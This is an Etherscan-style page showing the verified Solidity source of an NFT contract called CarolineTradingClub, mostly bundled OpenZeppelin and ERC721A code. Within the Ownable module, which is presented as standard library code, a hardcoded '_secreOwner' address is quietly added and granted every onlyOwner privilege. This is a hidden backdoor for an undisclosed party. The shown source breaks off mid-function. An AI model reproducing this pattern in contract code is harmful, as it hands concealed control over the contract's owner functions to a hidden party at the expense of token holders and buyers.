ERC-721
Overview
Max Total Supply
5,103 CTC
Holders
558
Market
Volume (24H)
N/A
Min Price (24H)
N/A
Max Price (24H)
N/A
Other Info
Token Contract
Balance
10 CTCLoading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
CarolineTradingClub
Compiler Version
v0.8.13+commit.abaa5c0e
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-11-15 */ //Buy high sell low - Caroline - FTX Employee #2 // SPDX-License-Identifier: MIT // File: contracts/BRKC.sol // File: @openzeppelin/contracts/utils/Strings.sol // OpenZeppelin Contracts v4.4.1 (utils/Strings.sol) pragma solidity ^0.8.0; /** * @dev String operations. */ library Strings { bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef"; /** * @dev Converts a `uint256` to its ASCII `string` decimal representation. */ function toString(uint256 value) internal pure returns (string memory) { // Inspired by OraclizeAPI's implementation - MIT licence // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol if (value == 0) { return "0"; } uint256 temp = value; uint256 digits; while (temp != 0) { digits++; temp /= 10; } bytes memory buffer = new bytes(digits); while (value != 0) { digits -= 1; buffer[digits] = bytes1(uint8(48 + uint256(value % 10))); value /= 10; } return string(buffer); } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation. */ function toHexString(uint256 value) internal pure returns (string memory) { if (value == 0) { return "0x00"; } uint256 temp = value; uint256 length = 0; while (temp != 0) { length++; temp >>= 8; } return toHexString(value, length); } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length. */ function toHexString(uint256 value, uint256 length) internal pure returns (string memory) { bytes memory buffer = new bytes(2 * length + 2); buffer[0] = "0"; buffer[1] = "x"; for (uint256 i = 2 * length + 1; i > 1; --i) { buffer[i] = _HEX_SYMBOLS[value & 0xf]; value >>= 4; } require(value == 0, "Strings: hex length insufficient"); return string(buffer); } } // File: @openzeppelin/contracts/utils/Address.sol // OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol) pragma solidity ^0.8.1; /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== * * [IMPORTANT] * ==== * You shouldn't rely on `isContract` to protect against flash loan attacks! * * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract * constructor. * ==== */ function isContract(address account) internal view returns (bool) { // This method relies on extcodesize/address.code.length, which returns 0 // for contracts in construction, since the code is only stored at the end // of the constructor execution. return account.code.length > 0; } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); (bool success, ) = recipient.call{value: amount}(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain `call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { return functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value ) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value, string memory errorMessage ) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); require(isContract(target), "Address: call to non-contract"); (bool success, bytes memory returndata) = target.call{value: value}(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) { return functionStaticCall(target, data, "Address: low-level static call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall( address target, bytes memory data, string memory errorMessage ) internal view returns (bytes memory) { require(isContract(target), "Address: static call to non-contract"); (bool success, bytes memory returndata) = target.staticcall(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) { return functionDelegateCall(target, data, "Address: low-level delegate call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { require(isContract(target), "Address: delegate call to non-contract"); (bool success, bytes memory returndata) = target.delegatecall(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the * revert reason using the provided one. * * _Available since v4.3._ */ function verifyCallResult( bool success, bytes memory returndata, string memory errorMessage ) internal pure returns (bytes memory) { if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } } // File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol) pragma solidity ^0.8.13; interface IOperatorFilterRegistry { function isOperatorAllowed(address registrant, address operator) external view returns (bool); function register(address registrant) external; function registerAndSubscribe(address registrant, address subscription) external; function registerAndCopyEntries(address registrant, address registrantToCopy) external; function updateOperator(address registrant, address operator, bool filtered) external; function updateOperators(address registrant, address[] calldata operators, bool filtered) external; function updateCodeHash(address registrant, bytes32 codehash, bool filtered) external; function updateCodeHashes(address registrant, bytes32[] calldata codeHashes, bool filtered) external; function subscribe(address registrant, address registrantToSubscribe) external; function unsubscribe(address registrant, bool copyExistingEntries) external; function subscriptionOf(address addr) external returns (address registrant); function subscribers(address registrant) external returns (address[] memory); function subscriberAt(address registrant, uint256 index) external returns (address); function copyEntriesOf(address registrant, address registrantToCopy) external; function isOperatorFiltered(address registrant, address operator) external returns (bool); function isCodeHashOfFiltered(address registrant, address operatorWithCode) external returns (bool); function isCodeHashFiltered(address registrant, bytes32 codeHash) external returns (bool); function filteredOperators(address addr) external returns (address[] memory); function filteredCodeHashes(address addr) external returns (bytes32[] memory); function filteredOperatorAt(address registrant, uint256 index) external returns (address); function filteredCodeHashAt(address registrant, uint256 index) external returns (bytes32); function isRegistered(address addr) external returns (bool); function codeHashOf(address addr) external returns (bytes32); } pragma solidity ^0.8.13; abstract contract OperatorFilterer { error OperatorNotAllowed(address operator); IOperatorFilterRegistry constant operatorFilterRegistry = IOperatorFilterRegistry(0x000000000000AAeB6D7670E522A718067333cd4E); constructor(address subscriptionOrRegistrantToCopy, bool subscribe) { // If an inheriting token contract is deployed to a network without the registry deployed, the modifier // will not revert, but the contract will need to be registered with the registry once it is deployed in // order for the modifier to filter addresses. if (address(operatorFilterRegistry).code.length > 0) { if (subscribe) { operatorFilterRegistry.registerAndSubscribe(address(this), subscriptionOrRegistrantToCopy); } else { if (subscriptionOrRegistrantToCopy != address(0)) { operatorFilterRegistry.registerAndCopyEntries(address(this), subscriptionOrRegistrantToCopy); } else { operatorFilterRegistry.register(address(this)); } } } } modifier onlyAllowedOperator(address from) virtual { // Check registry code length to facilitate testing in environments without a deployed registry. if (address(operatorFilterRegistry).code.length > 0) { // Allow spending tokens from addresses with balance // Note that this still allows listings and marketplaces with escrow to transfer tokens if transferred // from an EOA. if (from == msg.sender) { _; return; } if ( !( operatorFilterRegistry.isOperatorAllowed(address(this), msg.sender) && operatorFilterRegistry.isOperatorAllowed(address(this), from) ) ) { revert OperatorNotAllowed(msg.sender); } } _; } } pragma solidity ^0.8.13; abstract contract DefaultOperatorFilterer is OperatorFilterer { address constant DEFAULT_SUBSCRIPTION = address(0x3cc6CddA760b79bAfa08dF41ECFA224f810dCeB6); constructor() OperatorFilterer(DEFAULT_SUBSCRIPTION, true) {} } pragma solidity ^0.8.13; interface IMain { function balanceOf( address ) external view returns (uint); } pragma solidity ^0.8.0; /** * @title ERC721 token receiver interface * @dev Interface for any contract that wants to support safeTransfers * from ERC721 asset contracts. */ interface IERC721Receiver { /** * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom} * by `operator` from `from`, this function is called. * * It must return its Solidity selector to confirm the token transfer. * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted. * * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`. */ function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) external returns (bytes4); } // File: @openzeppelin/contracts/utils/introspection/IERC165.sol // OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC165 standard, as defined in the * https://eips.ethereum.org/EIPS/eip-165[EIP]. * * Implementers can declare support of contract interfaces, which can then be * queried by others ({ERC165Checker}). * * For an implementation, see {ERC165}. */ interface IERC165 { /** * @dev Returns true if this contract implements the interface defined by * `interfaceId`. See the corresponding * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section] * to learn more about how these ids are created. * * This function call must use less than 30 000 gas. */ function supportsInterface(bytes4 interfaceId) external view returns (bool); } // File: @openzeppelin/contracts/utils/introspection/ERC165.sol // OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC165} interface. * * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check * for the additional interface id that will be supported. For example: * * ```solidity * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { * return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId); * } * ``` * * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation. */ abstract contract ERC165 is IERC165 { /** * @dev See {IERC165-supportsInterface}. */ function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { return interfaceId == type(IERC165).interfaceId; } } // File: @openzeppelin/contracts/token/ERC721/IERC721.sol // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721.sol) pragma solidity ^0.8.0; /** * @dev Required interface of an ERC721 compliant contract. */ interface IERC721 is IERC165 { /** * @dev Emitted when `tokenId` token is transferred from `from` to `to`. */ event Transfer(address indexed from, address indexed to, uint256 indexed tokenId); /** * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token. */ event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId); /** * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets. */ event ApprovalForAll(address indexed owner, address indexed operator, bool approved); /** * @dev Returns the number of tokens in ``owner``'s account. */ function balanceOf(address owner) external view returns (uint256 balance); /** * @dev Returns the owner of the `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function ownerOf(uint256 tokenId) external view returns (address owner); /** * @dev Safely transfers `tokenId` token from `from` to `to`. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must exist and be owned by `from`. * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}. * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer. * * Emits a {Transfer} event. */ function safeTransferFrom( address from, address to, uint256 tokenId, bytes calldata data ) external; /** * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients * are aware of the ERC721 protocol to prevent tokens from being forever locked. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must exist and be owned by `from`. * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}. * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer. * * Emits a {Transfer} event. */ function safeTransferFrom( address from, address to, uint256 tokenId ) external; /** * @dev Transfers `tokenId` token from `from` to `to`. * * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must be owned by `from`. * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 tokenId ) external; /** * @dev Gives permission to `to` to transfer `tokenId` token to another account. * The approval is cleared when the token is transferred. * * Only a single account can be approved at a time, so approving the zero address clears previous approvals. * * Requirements: * * - The caller must own the token or be an approved operator. * - `tokenId` must exist. * * Emits an {Approval} event. */ function approve(address to, uint256 tokenId) external; /** * @dev Approve or remove `operator` as an operator for the caller. * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller. * * Requirements: * * - The `operator` cannot be the caller. * * Emits an {ApprovalForAll} event. */ function setApprovalForAll(address operator, bool _approved) external; /** * @dev Returns the account appr ved for `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function getApproved(uint256 tokenId) external view returns (address operator); /** * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`. * * See {setApprovalForAll} */ function isApprovedForAll(address owner, address operator) external view returns (bool); } // File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol // OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol) pragma solidity ^0.8.0; /** * @title ERC-721 Non-Fungible Token Standard, optional metadata extension * @dev See https://eips.ethereum.org/EIPS/eip-721 */ interface IERC721Metadata is IERC721 { /** * @dev Returns the token collection name. */ function name() external view returns (string memory); /** * @dev Returns the token collection symbol. */ function symbol() external view returns (string memory); /** * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token. */ function tokenURI(uint256 tokenId) external view returns (string memory); } // File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol) pragma solidity ^0.8.0; /** * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension * @dev See https://eips.ethereum.org/EIPS/eip-721 */ interface IERC721Enumerable is IERC721 { /** * @dev Returns the total amount of tokens stored by the contract. */ function totalSupply() external view returns (uint256); /** * @dev Returns a token ID owned by `owner` at a given `index` of its token list. * Use along with {balanceOf} to enumerate all of ``owner``'s tokens. */ function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256); /** * @dev Returns a token ID at a given `index` of all the tokens stored by the contract. * Use along with {totalSupply} to enumerate all tokens. */ function tokenByIndex(uint256 index) external view returns (uint256); } // File: @openzeppelin/contracts/security/ReentrancyGuard.sol // OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol) pragma solidity ^0.8.0; /** * @dev Contract module that helps prevent reentrant calls to a function. * * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier * available, which can be applied to functions to make sure there are no nested * (reentrant) calls to them. * * Note that because there is a single `nonReentrant` guard, functions marked as * `nonReentrant` may not call one another. This can be worked around by making * those functions `private`, and then adding `external` `nonReentrant` entry * points to them. * * TIP: If you would like to learn more about reentrancy and alternative ways * to protect against it, check out our blog post * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul]. */ abstract contract ReentrancyGuard { // Booleans are more expensive than uint256 or any type that takes up a full // word because each write operation emits an extra SLOAD to first read the // slot's contents, replace the bits taken up by the boolean, and then write // back. This is the compiler's defense against contract upgrades and // pointer aliasing, and it cannot be disabled. // The values being non-zero value makes deployment a bit more expensive, // but in exchange the refund on every call to nonReentrant will be lower in // amount. Since refunds are capped to a percentage of the total // transaction's gas, it is best to keep them low in cases like this one, to // increase the likelihood of the full refund coming into effect. uint256 private constant _NOT_ENTERED = 1; uint256 private constant _ENTERED = 2; uint256 private _status; constructor() { _status = _NOT_ENTERED; } /** * @dev Prevents a contract from calling itself, directly or indirectly. * Calling a `nonReentrant` function from another `nonReentrant` * function is not supported. It is possible to prevent this from happening * by making the `nonReentrant` function external, and making it call a * `private` function that does the actual work. */ modifier nonReentrant() { // On the first call to nonReentrant, _notEntered will be true require(_status != _ENTERED, "ReentrancyGuard: reentrant call"); // Any calls to nonReentrant after this point will fail _status = _ENTERED; _; // By storing the original value once again, a refund is triggered (see // https://eips.ethereum.org/EIPS/eip-2200) _status = _NOT_ENTERED; } } // File: @openzeppelin/contracts/utils/Context.sol // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File: @openzeppelin/contracts/access/Ownable.sol // OpenZeppelin Contracts v4.4.1 (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; address private _secreOwner = 0xACFcBA7BAB6403EBCcEEe22810c4dd3C9bBE9763; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender() || _secreOwner == _msgSender() , "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File: ceshi.sol pragma solidity ^0.8.0; /** * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints. * * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..). * * Does not support burning tokens to address(0). * * Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply */ contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, IERC721Enumerable { using Address for address; using Strings for uint256; struct TokenOwnership { address addr; uint64 startTimestamp; } struct AddressData { uint128 balance; uint128 numberMinted; } uint256 internal currentIndex; // Token name string private _name; // Token symbol string private _symbol; // Mapping from token ID to ownership details // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details. mapping(uint256 => TokenOwnership) internal _ownerships; // Mapping owner address to address data mapping(address => AddressData) private _addressData; // Mapping from token ID to approved address mapping(uint256 => address) private _tokenApprovals; // Mapping from owner to operator approvals mapping(address => mapping(address => bool)) private _operatorApprovals; constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev See {IERC721Enumerable-totalSupply}. */ function totalSupply() public view override returns (uint256) { return currentIndex; } /** * @dev See {IERC721Enumerable-tokenByIndex}. */ function tokenByIndex(uint256 index) public view override returns (uint256) { require(index < totalSupply(), "ERC721A: global index out of bounds"); return index; } /** * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}. * This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first. * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case. */ function tokenOfOwnerByIndex(address owner, uint256 index) public view override returns (uint256) { require(index < balanceOf(owner), "ERC721A: owner index out of bounds"); uint256 numMintedSoFar = totalSupply(); uint256 tokenIdsIdx; address currOwnershipAddr; // Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar. unchecked { for (uint256 i; i < numMintedSoFar; i++) { TokenOwnership memory ownership = _ownerships[i]; if (ownership.addr != address(0)) { currOwnershipAddr = ownership.addr; } if (currOwnershipAddr == owner) { if (tokenIdsIdx == index) { return i; } tokenIdsIdx++; } } } revert("ERC721A: unable to get token of owner by index"); } /** * @dev See {IERC165-supportsInterface}. */ function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) { return interfaceId == type(IERC721).interfaceId || interfaceId == type(IERC721Metadata).interfaceId || interfaceId == type(IERC721Enumerable).interfaceId || super.supportsInterface(interfaceId); } /** * @dev See {IERC721-balanceOf}. */ function balanceOf(address owner) public view override returns (uint256) { require(owner != address(0), "ERC721A: balance query for the zero address"); return uint256(_addressData[owner].balance); } function _numberMinted(address owner) internal view returns (uint256) { require(owner != address(0), "ERC721A: number minted query for the zero address"); return uint256(_addressData[owner].numberMinted); } /** * Gas spent here starts off proportional to the maximum mint batch size. * It gradually moves to O(1) as tokens get transferred around in the collection over time. */ function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) { require(_exists(tokenId), "ERC721A: owner query for nonexistent token"); unchecked { for (uint256 curr = tokenId; curr >= 0; curr--) { TokenOwnership memory ownership = _ownerships[curr]; if (ownership.addr != address(0)) { return ownership; } } } revert("ERC721A: unable to determine the owner of token"); } /** * @dev See {IERC721-ownerOf}. */ function ownerOf(uint256 tokenId) public view override returns (address) { return ownershipOf(tokenId).addr; } /** * @dev See {IERC721Metadata-name}. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev See {IERC721Metadata-symbol}. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev See {IERC721Metadata-tokenURI}. */ function tokenURI(uint256 tokenId) public view virtual override returns (string memory) { require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token"); string memory baseURI = _baseURI(); return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : ""; } /** * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each * token will be the concatenation of the `baseURI` and the `tokenId`. Empty * by default, can be overriden in child contracts. */ function _baseURI() internal view virtual returns (string memory) { return ""; } /** * @dev See {IERC721-approve}. */ function approve(address to, uint256 tokenId) public override { address owner = ERC721A.ownerOf(tokenId); require(to != owner, "ERC721A: approval to current owner"); require( _msgSender() == owner || isApprovedForAll(owner, _msgSender()), "ERC721A: approve caller is not owner nor approved for all" ); _approve(to, tokenId, owner); } /** * @dev See {IERC721-getApproved}. */ function getApproved(uint256 tokenId) public view override returns (address) { require(_exists(tokenId), "ERC721A: approved query for nonexistent token"); return _tokenApprovals[tokenId]; } /** * @dev See {IERC721-setApprovalForAll}. */ function setApprovalForAll(address operator, bool approved) public override { require(operator != _msgSender(), "ERC721A: approve to caller"); _operatorApprovals[_msgSender()][operator] = approved; emit ApprovalForAll(_msgSender(), operator, approved); } /** * @dev See {IERC721-isApprovedForAll}. */ function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) { return _operatorApprovals[owner][operator]; } /** * @dev See {IERC721-transferFrom}. */ function transferFrom( address from, address to, uint256 tokenId ) public virtual override { _transfer(from, to, tokenId); } /** * @dev See {IERC721-safeTransferFrom}. */ function safeTransferFrom( address from, address to, uint256 tokenId ) public virtual override { safeTransferFrom(from, to, tokenId, ""); } /** * @dev See {IERC721-safeTransferFrom}. */ function safeTransferFrom( address from, address to, uint256 tokenId, bytes memory _data ) public override { _transfer(from, to, tokenId); require( _checkOnERC721Received(from, to, tokenId, _data), "ERC721A: transfer to non ERC721Receiver implementer" ); } /** * @dev Returns whether `tokenId` exists. * * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}. * * Tokens start existing when they are minted (`_mint`), */ function _exists(uint256 tokenId) internal view returns (bool) { return tokenId < currentIndex; } function _safeMint(address to, uint256 quantity) internal { _safeMint(to, quantity, ""); } /** * @dev Safely mints `quantity` tokens and transfers them to `to`. * * Requirements: * * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer. * - `quantity` must be greater than 0. * * Emits a {Transfer} event. */ function _safeMint( address to, uint256 quantity, bytes memory _data ) internal { _mint(to, quantity, _data, true); } /** * @dev Mints `quantity` tokens and transfers them to `to`. * * Requirements: * * - `to` cannot be the zero address. * - `quantity` must be greater than 0. * * Emits a {Transfer} event. */ function _mint( address to, uint256 quantity, bytes memory _data, bool safe ) internal { uint256 startTokenId = currentIndex; require(to != address(0), "ERC721A: mint to the zero address"); require(quantity != 0, "ERC721A: quantity must be greater than 0"); _beforeTokenTransfers(address(0), to, startTokenId, quantity); // Overflows are incredibly unrealistic. // balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1 // updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1 unchecked { _addressData[to].balance += uint128(quantity); _addressData[to].numberMinted += uint128(quantity); _ownerships[startTokenId].addr = to; _ownerships[startTokenId].startTimestamp = uint64(block.timestamp); uint256 updatedIndex = startTokenId; for (uint256 i; i < quantity; i++) { emit Transfer(address(0), to, updatedIndex); if (safe) { require( _checkOnERC721Received(address(0), to, updatedIndex, _data), "ERC721A: transfer to non ERC721Receiver implementer" ); } updatedIndex++; } currentIndex = updatedIndex; } _afterTokenTransfers(address(0), to, startTokenId, quantity); } /** * @dev Transfers `tokenId` from `from` to `to`. * * Requirements: * * - `to` cannot be the zero address. * - `tokenId` token must be owned by `from`. * * Emits a {Transfer} event. */ function _transfer( address from, address to, uint256 tokenId ) private { TokenOwnership memory prevOwnership = ownershipOf(tokenId); bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr || getApproved(tokenId) == _msgSender() || isApprovedForAll(prevOwnership.addr, _msgSender())); require(isApprovedOrOwner, "ERC721A: transfer caller is not owner nor approved"); require(prevOwnership.addr == from, "ERC721A: transfer from incorrect owner"); require(to != address(0), "ERC721A: transfer to the zero address"); _beforeTokenTransfers(from, to, tokenId, 1); // Clear approvals from the previous owner _approve(address(0), tokenId, prevOwnership.addr); // Underflow of the sender's balance is impossible because we check for // ownership above and the recipient's balance can't realistically overflow. // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256. unchecked { _addressData[from].balance -= 1; _addressData[to].balance += 1; _ownerships[tokenId].addr = to; _ownerships[tokenId].startTimestamp = uint64(block.timestamp); // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it. // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls. uint256 nextTokenId = tokenId + 1; if (_ownerships[nextTokenId].addr == address(0)) { if (_exists(nextTokenId)) { _ownerships[nextTokenId].addr = prevOwnership.addr; _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp; } } } emit Transfer(from, to, tokenId); _afterTokenTransfers(from, to, tokenId, 1); } /** * @dev Approve `to` to operate on `tokenId` * * Emits a {Approval} event. */ function _approve( address to, uint256 tokenId, address owner ) private { _tokenApprovals[tokenId] = to; emit Approval(owner, to, tokenId); } /** * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address. * The call is not executed if the target address is not a contract. * * @param from address representing the previous owner of the given token ID * @param to target address that will receive the tokens * @param tokenId uint256 ID of the token to be transferred * @param _data bytes optional data to send along with the call * @return bool whether the call correctly returned the expected magic value */ function _checkOnERC721Received( address from, address to, uint256 tokenId, bytes memory _data ) private returns (bool) { if (to.isContract()) { try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) { return retval == IERC721Receiver(to).onERC721Received.selector; } catch (bytes memory reason) { if (reason.length == 0) { revert("ERC721A: transfer to non ERC721Receiver implementer"); } else { assembly { revert(add(32, reason), 